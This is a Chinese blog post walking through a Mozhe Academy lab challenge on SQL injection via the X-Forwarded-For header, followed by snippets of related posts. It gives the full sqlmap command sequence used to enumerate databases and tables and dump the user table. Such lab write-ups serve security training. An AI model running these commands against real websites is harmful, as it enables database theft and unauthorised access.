墨者学院----X-Forwarded-For注入漏洞实战

于 2024-07-23 17:22:11 发布
阅读量303 收藏
点赞数 6
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53736204/article/details/140641544
版权

墨者学院----X-Forwarded-For注入漏洞实战

分析题:X-Forwarded-For是请求头的一种,意思应该是通过这个请求头请求注入

image-20240723142946769

打开网页

image-20240723145031402

随便输入登录发现

image-20240723145105490

通过ip138.com这个IP是我的本地地址。

因为是POST传值,所以抓一下包

image-20240723145541367

发现没有X-Forwarded-For参数

我们自己加上,copy to file --1.txt

image-20240723151841023

设置注入点

image-20240723151941282

然后用sqlmap

1.查库

python3 sqlmap.py -r C:\Users\1\Desktop\1.txt --batch --dbs

image-20240723152053546

2.查表

python3 sqlmap.py -r C:\Users\1\Desktop\1.txt --batch  -D webcalendar --tables

image-20240723152146044

3.查user表

python3 sqlmap.py -r C:\Users\1\Desktop\1.txt --batch  -D webcalendar -T user --dump

image-20240723152214569

然后登录之后就能找到KEY

黑白时光les
关注
  • 6
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
墨者学院-X-Forwarded-For注入漏洞实战
weixin_42939822的博客
03-27 6311
墨者学院-X-Forwarded-For注入漏洞实战
01#墨者靶场-X-Forwarded-For注入漏洞实战
shy的博客
11-15 696
墨者学习01 By/shy014 1.在网站登陆处抓包,发现提示IP已被记录。...
墨者学院 X-Forwarded-For注入漏洞实战
crasher123的博客
06-19 1766
SQLMap是一个基于Python编写的工具,因此需要安装Python。可以从Python官方网站下载Python安装包,也可以使用包管理器进行安装。如果Python已经安装,则会显示Python的版本号。请求信息中多加一条X-Forwarded-For:*得到库表名user和login,继续攻击user表。运行后会显示SQLMap的欢迎信息和命令行帮助。得到数据库名称为webcalender,进行扫描。安装burpsuite和sqlmap。2.安装Python。4.运行SQLMap
墨者 - X-Forwarded-For注入漏洞实战
qq_24481913的博客
07-31 407
X-Forwarded-For:简称XFF头,代表了HTTP的请求端真实的IP。它被认为是客户端通过HTTP代理或者负载均衡器连接到web服务端获取源ip地址的一个标准(通常一些网站的防注入功能会记录请求端真实IP地址并写入数据库或某文件[通过修改XXF头可以实现伪造IP])。XFF,是X-Forwarded-for的缩写,属于SQL注入的一种,该注入原理是通过修改X-Forwarded-for头对带入系统的dns进行sql注入,达到欺骗服务器执行恶意的SQL命令的效果,从而可以得到网站的数据库内容。
墨者X-Forwarded-For注入漏洞实战
wswr的博客
03-10 741
思路:反正首先按照正常测sql注入点,我们都要对各个地方试试,什么看源码找可能存在的注入点,或者遇事不觉弱口令啥的,但是既然题目是XFF注入,那基本就是提交会对ip检测,因而存在注入点 总结:注入点的掌握,sqlmap抓包的使用和技巧(*),细心 ps:为什么不手巧代码,方便大伙复制命令,绝对不是因为懒,是因为自己敲一遍更有感觉,嗯嗯,没错!(我他喵敲了好多遍) admin/admin登入发现确实存在对ip的检测 然后就是burpsuite抓包改X-Forward-For字段 发.
墨者学院09 X-Forwarded-For注入漏洞实战
weixin_42789937的博客
02-10 563
墨者学院09 X-Forwarded-For注入漏洞实战,参考大佬wp,对于显错注入整理了手工和sqlmap两种注入流程~
墨者】X-Forwarded-For注入漏洞实战
weixin_48621644的博客
09-11 1291
小羊学安全 任重而道远 ~
墨者学院X-Forwarded-For注入漏洞实战
痴人说梦梦中人
11-13 361
1、 使用SQLmap,构造XFF,爆库,爆表,爆列,dump,md5解密获得密码登陆,获取key。 2、 爆库 –batch #从不询问用户输入,使用所有默认配置。 -r 从一个文件中载入HTTP请求 3、 爆表 4、 爆列 5、 Dump 6、 登陆获取key ...
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1题)、PHP代码分析溯源(第2题)、PHP逻辑漏洞利用实战(第1题)、SQL手工注入漏洞测试(Access数据库)
APP原型实例:墨者科技-旅行小蜜APP2.0.rp
12-17
产品经理
0080 APP原型实例:墨者科技-旅行小蜜APP2.0.rp
01-06
rp原型源文件
mogan-main.zip
12-28
墨干编辑器是一款由墨者实验室开发的高效结构化编辑器,专为科技领域的爱好者和专业人士设计,旨在提升文本编辑、代码编写以及排版工作的体验。这款应用工具集成了多种功能,包括文本编辑、代码编辑器和排版软件,...
墨者安全软件-免费杀毒软件
11-11
墨者安全专家是一款永久免费的免疫型安全防护软件,集墨者独创的 “革离术”、终身免费杀毒、修复系统漏洞、上网痕迹清理、网络防火墙、系统实时保护、安全互助社区等强大功能于一身。特别是独创的“革离术”,利用...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8352
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
方案-基于云架构的校园信息化建设方案.pdf
最新发布
07-29
方案-基于云架构的校园信息化建设方案.pdf
【创新未发表】Matlab实现蛇群优化算法SO-Kmean-Transformer-LSTM负荷预测算法研究.rar
07-29
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
【创新未发表】Matlab实现北方苍鹰优化算法NGO-Kmean-Transformer-LSTM组合状态识别算法研究.rar
07-29
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
【创新未发表】Matlab实现蝗虫优化算法GOA-Kmean-Transformer-BiLSTM组合状态识别算法研究.rar
07-29
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
墨者学院sql注入 x-f
07-27
墨者学院SQL注入是一种常见的Web应用程序安全漏洞,攻击者通过在输入字段中插入恶意的SQL代码来实现对数据库的非授权访问。X-F是HTTP请求头部的一个字段,通常用于传递客户端IP地址或其他相关信息。在某些情况下,攻击者可能会尝试利用X-F字段进行SQL注入攻击。为了防止SQL注入攻击,开发人员应该合理地验证和过滤用户输入,并使用参数化查询或预编译语句来防止SQL注入攻击。此外,最好避免将用户输入直接拼接到SQL查询中。墨者学院可能提供相关的课程或教程来帮助开发人员学习和理解如何防止SQL注入攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值